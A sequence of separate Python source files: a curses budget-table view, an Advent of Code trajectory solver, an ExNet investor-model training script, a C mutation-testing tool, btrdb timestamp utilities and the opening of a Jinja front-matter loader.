        # one formatted row per month: label + currency-formatted columns,
        # each padded to its column width minus one separator space
        rows = [
            [
                "{}-{}".format(months[(year_month_start[1] - 1 + i) % 12], \
                    (year_month_start[0] + (i - 1 + year_month_start[1]) // 12) % 1000),
                format_currency(self.data['cost']['income'][i], self.cols[1][1] - 1),
                format_currency(out_with_future[i], self.cols[2][1] - 1),
                format_currency(net[i], self.cols[3][1] - 1),
                format_currency(predicted[i], self.cols[4][1] - 1),
                format_currency(self.data['cost']['balance'][i], self.cols[5][1] - 1)
            ]
            for i in range(num_rows)
        ]
        return rows, year_month_start, year_month_now
    def draw(self):
        rows, year_month_start, year_month_now = self.calculate_data()
        colors = [
            curses.color_pair(NC_COLOR_TAB[0]), # inactive
            curses.color_pair(NC_COLOR_TAB_SEL[0]) # active
        ]
        # num['disp']: how many rows fit in the window (self.dim from Page)
        num = {
            'rows': len(rows),
            'disp': min(self.dim[0], len(rows))
        }
        # index of the current month's row (highlighted)
        active_row = 12 * (year_month_now[0] - year_month_start[0]) + \
                year_month_now[1] - year_month_start[1]
        # draw all the rows and columns
        for i in range(num['disp']):
            if i == 0:
                # header
                col = 0
                for (col_name, col_width) in self.cols:
                    self.win.addstr(0, col, alignr(col_width - 1, col_name))
                    col += col_width
            else:
                # data; show the most recent rows when they don't all fit
                row = num['rows'] - num['disp'] + i - 1 + 1
                active = row == active_row
                color = colors[1] if active else colors[0]
                if active:
                    # paint the whole active row's background first
                    self.win.addstr(i, 0, ' ' * self.dim[1], color)
                col = 0
                j = 0
                for (j, (col_name, col_width)) in enumerate(self.cols):
                    # bold the final (balance) column
                    self.win.addstr(i, col, ellipsis(rows[row][j], col_width), \
                            color | curses.A_BOLD if j == 5 else color)
                    col += col_width
    def set_nav_active(self, status):
        return False # this page can't be active
|
#!/usr/bin/env python3
from pathlib import Path
import re
class Probe:
    """Projectile state: position (x, y) and velocity (u, v)."""
    # Positions default to the origin via class attributes; the augmented
    # assignments in step() create per-instance attributes on first use.
    x = y = 0

    def __init__(self, u, v):
        self.u = u
        self.v = v

    def step(self):
        """Advance one time step: move, then apply drag to u and gravity to v."""
        self.x, self.y = self.x + self.u, self.y + self.v
        self.u = max(self.u - 1, 0)  # drag clamps horizontal velocity at zero
        self.v -= 1                  # gravity
class Target:
    """Axis-aligned target rectangle spanning x1..x2 and y1..y2."""

    def __init__(self, x1, x2, y1, y2):
        self.x1 = x1
        self.x2 = x2
        self.y1 = y1
        self.y2 = y2

    def _height(self, u, v):
        """Peak height reached if a probe launched at (u, v) hits the target.

        Returns None when the probe overshoots without ever being inside.
        """
        probe = Probe(u, v)
        while True:
            probe.step()
            if probe.x > self.x2 or probe.y < self.y1:
                return None  # past the target: it can no longer be hit
            if self.x1 <= probe.x and probe.y <= self.y2:
                # Apex of the arc is the triangular number of v.
                return (v + 1) * v // 2

    def heights(self, u):
        """Yield the peak height for every vertical speed that hits at this u."""
        for v in range(self.y1, -self.y1):
            height = self._height(u, v)
            if height is not None:
                yield height
def main():
    """Read the puzzle input and print the highest apex that still hits the target."""
    raw = Path('input', '17').read_text()
    target = Target(*[int(token) for token in re.findall('-?[0-9]+', raw)])
    best = max(h for u in range(target.x2 + 1) for h in target.heights(u))
    print(best)


if '__main__' == __name__:
    main()
|
import sys
sys.path.append('..')
from exnet_v3 import *
from sklearn.metrics import average_precision_score

# tf/np/pd come from exnet_v3's star import. Only take GPU memory as needed.
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices):
    # The experiment will only take necessary memory on the GPU.
    tf.config.experimental.set_memory_growth(physical_devices[0], True)

seed = 0
asset = 'TEF'

# Build params
n_experts = 4
spec_weight = 7.7e-4
entropy_weight = 4.2e-2
expert_architecture = [32, 32]
embedding_size = 32
dropout_rates = {'input': 0.1, 'hidden': 0.5}
weight_decay = {'l1': 0., 'l2': 0.}
gamma = 2.5

# Fit params
n_epochs = 400
patience = 20
batch_size = 1024
learning_rate = 7.8e-4
optimizer = 'nadam'
lookahead = True

# ===== Preparing data =====
data = pd.read_csv(f'data/IBEX_{asset}_dataset.csv')
n_investors = np.unique(data.investor_encoding.values).shape[0]
# Split masks — presumably boolean/0-1 columns; verify against the dataset.
train_idx = data['train_idx'].values
val_idx = data['val_idx'].values
test_idx = data['test_idx'].values
features = list(data.columns[3:-3])  # Removing irrelevant columns - date, encoding, target & splits.
data = data[['date', 'investor_encoding', 'buyer'] + features]
train_data = data[train_idx]
val_data = data[val_idx]
test_data = data[test_idx]
# Each split becomes (features, investor ids, one-hot buyer target).
train_data_ = (train_data[features].values.astype(np.float32),
               train_data.investor_encoding.values.astype(np.int32),
               pd.get_dummies(train_data.buyer).values.astype(np.float32))
val_data_ = (val_data[features].values.astype(np.float32),
             val_data.investor_encoding.values.astype(np.int32),
             pd.get_dummies(val_data.buyer).values.astype(np.float32))
test_data_ = (test_data[features].values.astype(np.float32),
              test_data.investor_encoding.values.astype(np.int32),
              pd.get_dummies(test_data.buyer).values.astype(np.float32))

# ===== Training model =====
print(f'Training on {train_data_[0].shape[0]} samples, validating on {val_data_[0].shape[0]} samples.')
# FIX: pass the configured weight_decay / optimizer / lookahead variables
# instead of re-hardcoding their literals — the variables defined above were
# otherwise silently unused, so editing them had no effect.
model = ExNet(n_feats=len(features), output_dim=2, n_experts=n_experts, expert_architecture=expert_architecture,
              n_investors=n_investors, embedding_size=embedding_size, dropout_rates=dropout_rates, weight_decay=weight_decay,
              spec_weight=spec_weight, entropy_weight=entropy_weight, gamma=gamma, name=f'ExNet_{asset}')
model.fit(train_data=train_data_, val_data=val_data_, n_epochs=n_epochs, batch_size=batch_size, optimizer=optimizer,
          learning_rate=learning_rate, lookahead=lookahead, patience=patience, seed=seed,
          save_path='models/')

# ===== Results =====
# predict() receives (features, investor ids); average precision is computed
# on the positive-class column.
train_pred = model.predict(train_data_[0:2])
val_pred = model.predict(val_data_[0:2])
test_pred = model.predict(test_data_[0:2])
train_score = average_precision_score(train_data.buyer.values, train_pred[:, 1])
val_score = average_precision_score(val_data.buyer.values, val_pred[:, 1])
test_score = average_precision_score(test_data.buyer.values, test_pred[:, 1])
print(f'train ap: {100*train_score:.2f} - val ap: {100*val_score:.2f} - test ap: {100*test_score:.2f}')
_ = model.get_experts_repartition(print_stats=True)
model.plot_experts_repartition()
model.plot_experts_umap(n_neighbors=50, min_dist=0.1)
|
import shutil
import utils
import sys
import os
import random
from typing import Tuple, List
# Replacement text representing "delete the matched token".
NULL_STRING = " "
# Named sets of mutation patterns. Each set maps an original source substring
# to either a single replacement string or a list of candidate replacements.
pattern_dict = {
    # To use "test_patterns" as the mutation pattern set, set "patterns" attribute in
    # configuration json to "test_patterns".
    "test_patterns" : {
        " < " : " == "
    },
    # Add your own custom pattern sets here. eg.
    # "<YOUR_CUSTOM_PATTERNS>" : {
    #     " > " : [ " < ", " == " ],
    #     " return " : " return -1 * ",
    #     ...
    # }
    "custom_patterns" : {
        " < " :
            [" <= ", " > ", " == "],
        "==" : "!=",
        "!=" : "==",
        " && " : " || ",
        " || " : " && ",
        "++" :
            [ "+=2", "-=2" ],
        " + " : " - ",
        " * " : " + ",
        " - " : " + ",
        "break;" : "{;}",
        " free(": "// free(",
        "[" :
            [ "[ -1 + ", "[ 1 + ", "[ 0 * " ],
        "," :
            [ ", -2 * ", ", 2 * " ],
        "0x00" :
            [ "0x01", "0x55" ],
        "0x01" :
            [ "0x00", "0x05" ],
        "return " :
            [ "return 2 * ", "return -2 * " ]
    },
    "default_patterns" : {
        # relational operators
        " < " :
            [ " == ", " != ", " > ", " <= ", " >= "],
        " > " :
            [ " != ", " < ", " <= ", " >= ", " == " ],
        "<=" :
            [ " != ", " < ", " > ", " >= ", "==" ],
        ">=" :
            [ " != ", " < ", " <= ", " > ", "==" ],
        "==" :
            [ " != ", " = ", " < ", " > ", " <= ", " >= " ],
        "!=" :
            [ " == ", " = ", " < ", " > ", " <= ", " >= " ],
        # " = " :
        #     [ " == ", " != ", " < ", " > ", " <= ", " >= ", " = 0 * ", " = 0 ;//", " = NULL; //", " = ! " ],
        # arithmetic operators
        " + " :
            [ " - ", " * ", " / ", " % " ],
        " - " :
            [ " + ", " * ", " / ", " % " ],
        " * " :
            [ " + ", " - ", " / ", " % " ],
        # " / " :
        #     [ " % ", " * ", " + ", " - " ],
        # " % " :
        #     [ " / ", " + ", " - ", " * " ],
        " + 1" :
            [ " - 1", "+ 0", "+ 2", "- 2" ],
        " - 1" :
            [ " + 1", "+ 0", "+ 2", "- 2" ],
        # " & " :
        #     [ " | ", " ^ " ],
        # " | " :
        #     [ " & ", " ^ " ],
        # " ^ " :
        #     [ " & ", " | " ],
        # " &= " :
        #     [ " |= ", " ^= " ],
        # " |= " :
        #     [ " &= ", " ^= " ],
        # " ^= " :
        #     [ " &= ", " |= " ],
        # " ~" :
        #     [ " !", NULL_STRING ],
        # " !" :
        #     [ " ~", NULL_STRING ],
        # logical / shift operators
        " && " :
            [ " & ", " || "," && !" ],
        " || " :
            [ " | ", " && ", " || !" ],
        " >> " : " << ",
        " << " : " >> ",
        " << 1" :
            [ " << 0"," << -1", "<< 2" ],
        " >> 1" :
            [ " >> 0", " >> -1", ">> 2" ],
        # increment / decrement
        "++" : "--",
        "--" : "++",
        "++;" :
            [ "--;", "+=2;", "-=2;" ],
        "++)" :
            [ "--)", "+=2)", "-=2)" ],
        "--;" :
            [ "++;", "+=2;", "-=2;" ],
        "--)" :
            [ "++)", "+=2)", "-=2)" ],
        # control flow
        " true " : " false ",
        " false " : " true ",
        "if (" :
            [ "if ( ! ", "if ( ~ ", "if ( 1 || ", "if ( 0 && " ],
        "while (" :
            [ "while ( ! ", "while ( ~ ", "while ( 0 && " , "// while (", " if (", "if (!"],
        "break;" : "{;}",
        "continue;" : "{;}",
        "goto " : "//goto ",
        "return " :
            [ "return 0; //", "return 1; //", "return NULL; //", "return -1; //", "return 2* ", "return -1 * " ],
        # for embedded systems
        "0x00" :
            [ "0x01", "0x05", "0x0A", "0x0F", "0xAA", "0x55", "0xFF" ],
        "0x01 " :
            [ "0x00 ", "0x05 ", "0x0A ", "0x0F " ],
        "0x05 " :
            [ "0x00 ", "0x01 ", "0x0A ", "0x0F " ],
        "0x0A " :
            [ "0x00 ", "0x01 ", "0x05 ", "0x0F " ],
        "0x0F " :
            [ "0x00 ", "0x01 ", "0x05 ", "0x0A " ],
        "0x55 " :
            [ "0x00 ", "0xAA ", "0xFF " ],
        "0xAA " :
            [ "0x00 ", "0x55 ", "0xFF " ],
        "0xFF " :
            [ "0x00 ", "0x55 ", "0xAA " ],
        # indexing / call arguments
        "[" :
            [ "[ -1 + ", "[ 1 + ", "[ 0 * " ],
        "(": " (! ",
        ");":
            [ "*0);", "*-1);", "*2);" ],
        "," :
            [ ", ! ", ", 0 * ", ", -1 * ", ", 2 *" ],
        " ? " :
            [ " && 0 ? ", " || 1 ? " ],
        # type substitutions
        " int " :
            [" short int ", " char " ],
        " signed " : " unsigned ",
        " unsigned " : " signed ",
        " long " :
            [ " int ", " short int ", " char " ],
        " float ": " int ",
        " double ": " int ",
        " free(": "// free(",
        "case ": "// case ",
        "default ": "// default ",
        # null terminate a string
        "\"": "\"\\0",
        "else {": "{",
        "else": "// else",
    }
}
class Occurrence():
    """ Object to keep track of a pattern's occurrence.
    Access the object's fields directly.
    `pattern`: a Pattern type.
    `file`: str containing path to the file (source code).
    `line`: int containing the line in the file where the `pattern` is found.
    `index`: int representing the index of the line where the `pattern` occurs.
    """
    def __init__(self, pattern, file, line, index):
        self.pattern = pattern
        self.file = file
        self.line = line
        self.index = index

    def __str__(self):
        return 'Pattern {} found at File: {}, Line: {}, Index: {}'.format(
            self.pattern.pattern, self.file, self.line, self.index)

    def __repr__(self):
        return '({}, {}, {}, {})'.format(self.pattern, self.file, self.line, self.index)
class Pattern():
    """ Represents a mutation pattern
    Access fields directly.
    `pattern`: str containing the original mutant operator.
    `transformation`: str containing the mutated operator.
    eg. `pattern`: " = ", `transformation`: " <= "
    """
    def __init__(self, pattern, transformation):
        self.pattern = pattern
        self.transformation = transformation

    def __str__(self):
        return '{} : {}'.format(self.pattern, self.transformation)
class Mutator():
    """ The main driver object to create mutations for a run.
    Create one Mutator object for each set of patterns and source code files.
    """
    def __init__(self, src: dict, mutation_patterns: dict, rng=None):
        """ Initializes various fields
        `src` is a dictionary mapping from a path to file to a list of line ranges. eg.
        {
            "code.c" : [],
            "code2.c" : [[1,12],[50,150]]
        }
        `mutation_pattern` is a dictionary mapping from str to list of str or str. eg.
        {
            " == " : [ " <= ", " != " ],
            " return " : [" return -2 * ", " return -1 + "],
            "++" : "--"
        }
        `rng` is a Random type, or None for a fresh generator.
        """
        utils.yellow_print("CWD: {}".format(os.getcwd()))
        self.olds = [] # stores original file paths
        self.modified = [] # stores path to the modified file
        self.lines_to_mutate = {} # maps file to the lines that file should mutate
        self.src = src
        for f in self.src:
            # create copies of the original
            old = '{}.old'.format(f)
            shutil.copyfile(f, old)
            self.olds.append(old)
            self.modified.append(f)
            # process the line intervals into a list of line numbers
            if len(self.src[f]) == 0:
                # no ranges given: every line of the file is eligible
                # FIX: close the file handle (the original leaked it)
                with open(f) as fh:
                    line_count = len(fh.read().split('\n'))
                self.lines_to_mutate[old] = list(range(1, line_count + 1))
            else:
                self.lines_to_mutate[old] = utils.flatten(utils.merge(self.src[f]))
        # FIX: the original default `rng=random.Random()` was a shared mutable
        # default evaluated once at definition time; create per-instance RNGs.
        self.rng = rng if rng is not None else random.Random()
        self.mutation_patterns = self.flattenPatterns(mutation_patterns)
        self.pattern_generator = self.mutation_patterns.copy()
        self.file_index = None

    def restore(self):
        """ Restores source files by replacing src with old
        Path should be root directory /freertos
        """
        for i in range(len(self.src)):
            shutil.copyfile(self.olds[i], self.modified[i])
        utils.yellow_print("Source Code Restored")

    def cleanup(self):
        """ Cleans up by deleting all old files
        """
        self.restore()
        for i in range(len(self.src)):
            os.remove(self.olds[i])

    def mutate(self, occurrence: Occurrence) -> Tuple[str, str]:
        """ Mutates given `occurrence` using `occurrence.pattern`
        Returns the original line and the mutated line
        See mutator.py for information on what a Occurrence object is
        """
        mutation_pattern = occurrence.pattern
        with open(occurrence.file) as fh:
            source_code = fh.read().split('\n')
        print("\n==> @ Line: " + str(occurrence.line) + "\n")
        print("Original Line : " + source_code[occurrence.line - 1].strip())
        # replace only the first occurrence at/after the recorded index
        mutated_line = (source_code[occurrence.line - 1][0:occurrence.index] +
                        source_code[occurrence.line - 1][occurrence.index:]
                        .replace(mutation_pattern.pattern, mutation_pattern.transformation, 1))
        print("After Mutation : " + mutated_line.strip())
        # FIX: rstrip('.old') strips any trailing '.', 'o', 'l', 'd' characters
        # (e.g. "foo.d.old" -> "foo"); remove the exact '.old' suffix instead.
        target = occurrence.file
        if target.endswith('.old'):
            target = target[:-len('.old')]
        self.write_to_file(target, source_code, occurrence.line - 1, mutated_line)
        return source_code[occurrence.line - 1], mutated_line

    def write_to_file(self, path, source_code, mutated_line_number, mutated_line):
        """ Writes a file to `path` by replacing line at `mutated_line_number` in `source_code`
        with `mutated_line`.
        Helper to separate write to file process with mutate function.
        """
        # FIX: use a context manager so the handle is closed even on error
        with open(path, "w") as output_file:
            for i in range(0, len(source_code)):
                if i == mutated_line_number:
                    # keep the original line alongside the mutation for reference
                    output_file.write("/* XXX: original code was : " + source_code[i] + " */\n")
                    output_file.write(mutated_line + "\n")
                else:
                    output_file.write(source_code[i] + "\n")
        print("\nOutput written to " + path + "\n")

    def findOccurrences(self, mutation_pattern: Pattern) -> List[Occurrence]:
        """ Finds all occurrences of given `mutation_pattern` in current Mutator
        `mutation_pattern` is a Pattern type. (see mutator.Pattern in mutator.py)
        Returns a list of Occurrence objects of the given `mutation_pattern`
        (see mutator.Occurrence in mutator.py)
        If there are multiple source files, searches all of them. Occurrence object
        contains fields to access file, line, and index within line to find the exact
        substring of the pattern.
        """
        occurrences = []
        m = mutation_pattern.pattern
        for f in self.olds:
            with open(f) as fh:
                source_code = fh.read().split('\n')
            ignored_lines = set()
            for line in self.lines_to_mutate[f]:
                # do not mutate preprocessor, comments, or assert statements
                if (source_code[line - 1].strip().startswith("#") or
                        source_code[line - 1].strip().startswith("//")):
                    continue
                # add block comments to ignored line set
                if "/*" in source_code[line - 1]:
                    while "*/" not in source_code[line - 1]:
                        ignored_lines.add(line)
                        line += 1
                    ignored_lines.add(line)
                if line in ignored_lines:
                    continue
                # count the number of times this mutation pattern base appears
                number_of_substrings_found = source_code[line - 1].count(m)
                mutate_at_index = 0
                # if there is at least one occurrence
                if number_of_substrings_found > 0:
                    for _ in range(0, number_of_substrings_found):
                        # find the index of the first occurrence
                        if mutate_at_index == 0:
                            mutate_at_index = source_code[line - 1].index(m)
                        else:
                            # an occurrence has been found, so begin looking only at the previous
                            # location's index + 1 (the index after the previous occurrence)
                            mutate_at_index = source_code[line - 1].index(m, mutate_at_index + 1)
                        occurrences.append(Occurrence(mutation_pattern, f, line, mutate_at_index))
        return occurrences

    def flattenPatterns(self, mutation_patterns):
        """ Flattens `mutation_patterns` into a list of mutation patterns
        `mutation_patterns` is a dictionary with mutant patterns
        Returns a list of Pattern objects (see mutator.Pattern in mutator.py).
        For ease of definition, the mutation_patterns is supplied as a dictionary,
        either through the default patterns, or through the configs.
        This function will process the dictionary into a list by creating Pattern
        objects for each key - transformation pair.
        """
        mutation_list = []
        for m in mutation_patterns:
            if not isinstance(mutation_patterns[m], str):
                # a list of candidate transformations: one Pattern per entry
                for transformation in mutation_patterns[m]:
                    mutation_list.append(Pattern(m, transformation))
            else:
                mutation_list.append(Pattern(m, mutation_patterns[m]))
        return mutation_list

    def getPatterns(self) -> List[Pattern]:
        """ Returns a list of flattened Pattern objects
        """
        return self.mutation_patterns

    def generateMutants(self, mutants_per_pattern=10, random=False) -> List[Occurrence]:
        """ Returns a list of occurrences including multiple different patterns
        For each pattern, the list contains a maximum of `mutants_per_pattern` number of
        occurrences. Default is 10 if not provided.
        If `random` is True, then the list is shuffled using this mutator's rng
        """
        utils.yellow_print("Searching for patterns...")
        # list of mutations to execute, contains occurrence objects
        mutations_list = []
        # dictionary that maps a pattern to the list of occurrences
        mutations_dict = {}
        # go through each pattern
        for mp in self.getPatterns():
            # find their occurrences
            occurrences_with_mp = self.findOccurrences(mutation_pattern=mp)
            # if occurrences are found add them to dictionary
            if mp not in mutations_dict:
                mutations_dict[mp] = []
            if random:
                self.rng.shuffle(occurrences_with_mp)
            mutations_dict[mp] += occurrences_with_mp[0:mutants_per_pattern]
        for mp in mutations_dict:
            mutations_list += mutations_dict[mp]
        if random:
            self.rng.shuffle(mutations_list)
        return mutations_list

    def nextRandomPattern(self):
        """ Gets a random pattern
        Ensures that the same pattern is not selected twice
        """
        if len(self.pattern_generator) == 0:
            self.pattern_generator = self.mutation_patterns.copy()
        # swap the chosen pattern to the end and pop it, so it cannot repeat
        index = self.rng.randint(0, len(self.pattern_generator) - 1)
        ret = self.pattern_generator[index]
        self.pattern_generator[index] = self.pattern_generator[len(self.pattern_generator) - 1]
        self.pattern_generator[len(self.pattern_generator) - 1] = ret
        self.pattern_generator.pop()
        return ret

    def generateRandomMutant(self) -> Tuple[Pattern, Occurrence, str, str]:
        """ Mutates a line in the code by choosing random pattern then a random line
        When running mutants sequentially and we want to control mutant order,
        it would not be a good idea to use this call as it gives a
        random mutant.
        It is a better idea to set up your own runs with the other API methods. However,
        this can be used as an example for what this class can do.
        """
        # Reset pattern_generator to all patterns
        self.pattern_generator = self.mutation_patterns.copy()
        # Go through every pattern to find an occurrence
        while len(self.pattern_generator) > 0:
            pattern = self.nextRandomPattern()
            occurrences = self.findOccurrences(pattern)
            if len(occurrences) != 0:
                occurrence = self.rng.choice(occurrences)
                original_line, mutated_line = self.mutate(occurrence)
                return pattern, occurrence, original_line, mutated_line
        utils.red_print("Could not create a mutant. Please make sure it is a C file.")
        utils.red_print("You may need to indent your C file.")
        return None
|
# btrdb.utils.timez
# Conversion utilities for btrdb
#
# Author: PingThings
# Created: Wed Jan 02 17:00:49 2019 -0500
#
# Copyright (C) 2018 PingThings LLC
# For license information, see LICENSE.txt
#
# ID: timez.py [] allen@pingthings.io $
"""
Time related utilities
"""
##########################################################################
## Imports
##########################################################################
from datetime import datetime, timezone
from decimal import Decimal
from operator import mul

import pytz
##########################################################################
## Module Variables
##########################################################################
# Candidate string formats accepted by `to_nanoseconds`, tried in order.
# Formats without %z yield naive datetimes, which `datetime_to_ns`
# interprets as UTC.
DATETIME_FORMATS = (
    "%Y-%m-%d %H:%M:%S.%f%z",       # most common RFC3339 nanoseconds
    "%Y-%m-%d %H:%M:%S.%f",         # expects UTC default timezone
    "%Y-%m-%dT%H:%M:%S.%fZ",        # JSON encoding, UTC timezone
    "%Y-%m-%dT%H:%M:%SZ",           # JSON encoding, UTC timezone, no microseconds
    "%Y-%m-%dT%H:%M:%S.%f%z",       # less common JSON-ish encoding
    "%Y-%m-%dT%H:%M:%S.%f",         # for completeness, UTC default timezone
    "%Y-%m-%d %H:%M:%S%z",          # human readable date time with TZ
    "%Y-%m-%d %H:%M:%S",            # human readable date time UTC default
    "%Y-%m-%d",                     # helper to get midnight on a particular date
)
##########################################################################
## Functions
##########################################################################
def currently_as_ns():
    """
    Returns the current UTC time as nanoseconds since epoch

    Returns
    -------
    current UTC time as nanoseconds since epoch : int
    """
    # BUG FIX: datetime.utcnow() returns a *naive* datetime, and .timestamp()
    # interprets naive datetimes in local time — skewing the result by the
    # host's UTC offset.  An aware UTC datetime avoids that entirely.
    dt = datetime.now(timezone.utc)
    return int(dt.timestamp() * 1e9)
def ns_to_datetime(ns):
    """
    Converts nanoseconds to a timezone-aware datetime object (UTC)

    Parameters
    ----------
    ns : int
        nanoseconds since epoch

    Returns
    -------
    nanoseconds since epoch as a datetime object : datetime
    """
    # datetime.utcfromtimestamp() is deprecated since Python 3.12; build an
    # aware UTC datetime directly instead of localizing a naive one afterwards.
    return datetime.fromtimestamp(ns / 1e9, tz=timezone.utc)
def datetime_to_ns(dt):
    """
    Converts a datetime object to nanoseconds since epoch. If a timezone aware
    object is received then it will be converted to UTC.

    Parameters
    ----------
    dt : datetime
        naive datetimes are interpreted as already being in UTC

    Returns
    -------
    nanoseconds : int
    """
    if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
        # naive datetime: attach UTC without shifting the wall-clock value
        aware = dt.replace(tzinfo=timezone.utc)
    else:
        aware = dt
    dt_utc = aware.astimezone(timezone.utc)
    # BUG FIX: `timestamp() * 1e9` goes through a 64-bit float, which cannot
    # represent modern epoch values at nanosecond resolution (2**53 < 1e18).
    # Exact integer timedelta arithmetic preserves full precision.
    delta = dt_utc - datetime(1970, 1, 1, tzinfo=timezone.utc)
    return (delta.days * 86400 + delta.seconds) * 10**9 + delta.microseconds * 1000
def to_nanoseconds(val):
    """
    Converts datetime, datetime64, float, str (RFC 2822) to nanoseconds. If a
    datetime-like object is received then nanoseconds since epoch is returned.

    Parameters
    ----------
    val : datetime, datetime64, float, str
        an object to convert to nanoseconds

    Returns
    -------
    object converted to nanoseconds : int

    Raises
    ------
    ValueError
        for unparseable strings or non-integral floats
    TypeError
        for unsupported input types

    Notes
    ----
    The following string formats are supported for conversion.

    +--------------------------------+------------------------------------------+
    | Format String                  | Description                              |
    +================================+==========================================+
    | %Y-%m-%d %H:%M:%S.%f%z         | RFC3339 format                           |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%d %H:%M:%S.%f           | RFC3339 with UTC default timezone        |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%dT%H:%M:%S.%fZ          | JSON encoding, UTC timezone              |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%dT%H:%M:%SZ             | JSON encoding, UTC timezone, without μs  |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%dT%H:%M:%S.%f%z         | JSON-like encoding                       |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%dT%H:%M:%S.%f           | JSON-like encoding, UTC default timezone |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%d %H:%M:%S%z            | human readable date time with TZ         |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%d %H:%M:%S              | human readable date time UTC default     |
    +--------------------------------+------------------------------------------+
    | %Y-%m-%d                       | midnight at a particular date            |
    +--------------------------------+------------------------------------------+
    """
    if val is None or isinstance(val, int):
        return val
    try:
        # numpy support is optional; datetime64 is converted to datetime
        import numpy as np
        if isinstance(val, np.datetime64):
            val = val.astype(datetime)
    except ImportError:
        pass
    if isinstance(val, str):
        # handle int as string, including signed values ("-123"/"+123"),
        # which the previous bare isdigit() check rejected
        candidate = val[1:] if val[:1] in ('+', '-') else val
        if candidate.isdigit():
            return int(val)
        # handle datetime as string (first matching format wins)
        for fmt in DATETIME_FORMATS:  # renamed from `format` (shadowed builtin)
            try:
                val = datetime.strptime(val, fmt)
                break
            except ValueError:
                pass
        if isinstance(val, str):
            raise ValueError("unsupported string format, please use RFC3339")
    if isinstance(val, datetime):
        return datetime_to_ns(val)
    if isinstance(val, float):
        if val.is_integer():
            return int(val)
        else:
            raise ValueError("can only convert whole numbers to nanoseconds")
    raise TypeError("only int, float, str, datetime, and datetime64 are allowed")
def ns_delta(days=0, hours=0, minutes=0, seconds=0, milliseconds=0,
             microseconds=0, nanoseconds=0):
    """
    Similar to `timedelta`, ns_delta represents a span of time but as
    the total number of nanoseconds.

    Parameters
    ----------
    days : int, float, decimal.Decimal
        days (as 24 hours) to convert to nanoseconds
    hours : int, float, decimal.Decimal
        hours to convert to nanoseconds
    minutes : int, float, decimal.Decimal
        minutes to convert to nanoseconds
    seconds : int, float, decimal.Decimal
        seconds to convert to nanoseconds
    milliseconds : int, float, decimal.Decimal
        milliseconds to convert to nanoseconds
    microseconds : int, float, decimal.Decimal
        microseconds to convert to nanoseconds
    nanoseconds : int
        nanoseconds to add to the time span

    Returns
    -------
    amount of time in nanoseconds : int
    """
    # Nanoseconds per unit, built up from microseconds.
    NS_PER_US = 1000
    NS_PER_MS = NS_PER_US * 1000
    NS_PER_SECOND = NS_PER_MS * 1000
    NS_PER_MINUTE = NS_PER_SECOND * 60
    NS_PER_HOUR = NS_PER_MINUTE * 60
    NS_PER_DAY = NS_PER_HOUR * 24
    if not isinstance(nanoseconds, int):
        raise TypeError("nanoseconds argument must be an integer")
    total = nanoseconds
    for amount, factor in ((days, NS_PER_DAY), (hours, NS_PER_HOUR),
                           (minutes, NS_PER_MINUTE), (seconds, NS_PER_SECOND),
                           (milliseconds, NS_PER_MS), (microseconds, NS_PER_US)):
        # Floats are routed through Decimal so fractional units do not
        # accumulate binary floating-point error during scaling.
        if isinstance(amount, float):
            amount = Decimal(amount)
        total += amount * factor
    return int(total)
|
"""
Jinja support adds the following abilities:
1. Adds a ``YamlFrontMatterLoader``, which searches the beginning of the file for
YAML between two lines of an equal number of three or more dashes.
These lines are stripped off before rendering.
2. Jinja has nice support for displaying errors, but the YAML front matter
confuses things. This module fixes that, too, using a ``StrangeCaseStr``
which keeps track of how many lines to ignore. The blank lines are included
during compilation, and removed after the file is generated.
3. Provides a ``fix_paths`` function that returns a slash-separated relative path,
even on Windows.
Note: This function will also chomp any in-filename backslashes.
Hopefully you don't have any of those in the relative path to your template.
"""
import re
import os
from jinja2 import FileSystemLoader, Environment, Template
from jinja2.utils import internalcode
class StrangeCaseEnvironment(Environment):
    """Jinja environment preconfigured for StrangeCase: installs the
    YAML-front-matter loader (searching the project path, the current
    directory and the filesystem root) and the StrangeCase template class."""
    def __init__(self, project_path, *args, **kwargs):
        search_paths = [fix_path(project_path), os.getcwd(), '/']
        kwargs['loader'] = YamlFrontMatterLoader(search_paths)
        # Must be set before Environment.__init__ so templates are built
        # with the front-matter-aware class.
        self.template_class = StrangeCaseTemplate
        super(StrangeCaseEnvironment, self).__init__(*args, **kwargs)
class StrangeCaseStr(str):
    """A ``str`` subclass that records how many YAML front-matter lines were
    replaced with blank lines, so they can be stripped after rendering."""
    def __new__(cls, content, number_yaml_lines):
        # Use `cls` (not hard-coded `str`) so subclassing works.  The original
        # also called `s.__init__(number_yaml_lines)`, which was a no-op
        # (str defines no __init__) and has been removed.
        s = str.__new__(cls, content)
        s.number_yaml_lines = number_yaml_lines
        return s
class StrangeCaseTemplate(Template):
    """Template that strips the blank lines which replaced YAML front matter
    (count carried in ``number_yaml_lines``) from the rendered output."""
    def render(self, *args, **kwargs):
        rendered = super(StrangeCaseTemplate, self).render(*args, **kwargs)
        strip_count = getattr(self, 'number_yaml_lines', None)
        if strip_count is not None:
            # Drop the leading placeholder lines inserted by the loader.
            rendered = "\n".join(rendered.splitlines()[strip_count:])
        return rendered
class YamlFrontMatterLoader(FileSystemLoader):
    """
    After getting the file content, this loader parses out YAML front matter,
    which must be the first thing in the file. It consists of three or more
    dashes or backticks, a newline, YAML content, a newline and then the same
    number of dashes or backticks, and a newline again.
    Examples::
        ----
        yaml: {goes: 'here'}
        ----
        <!-- template -->
        ````
        python = {'goes': 'here'}
        ````
        <!-- template -->
    When the python code is executed, it is given ``config`` as the local
    context, so changes to local variables result in changes to the page
    context.
    """
    def get_source(self, environment, template):
        """
        Matches 3 or more dashes or backticks at the beginning of the content,
        and then tries to match the same delimiter as the closing line.
        Returns a ``StrangeCaseStr`` whose ``number_yaml_lines`` records how
        many lines of front matter were replaced with blank lines (keeping
        Jinja's reported error line numbers aligned with the file on disk).
        """
        contents, filename, uptodate = super(YamlFrontMatterLoader, self).get_source(environment, template)
        # opening delimiter: 3+ dashes or 3+ backticks followed by a newline
        front_matter_match = re.match(r"\A([-]{3,}|[`]{3,})(\r\n|\r|\n)", contents)
        number_yaml_lines = 0
        if front_matter_match:
            newline = front_matter_match.group(2)  # group(2) contains the newline/CRLF
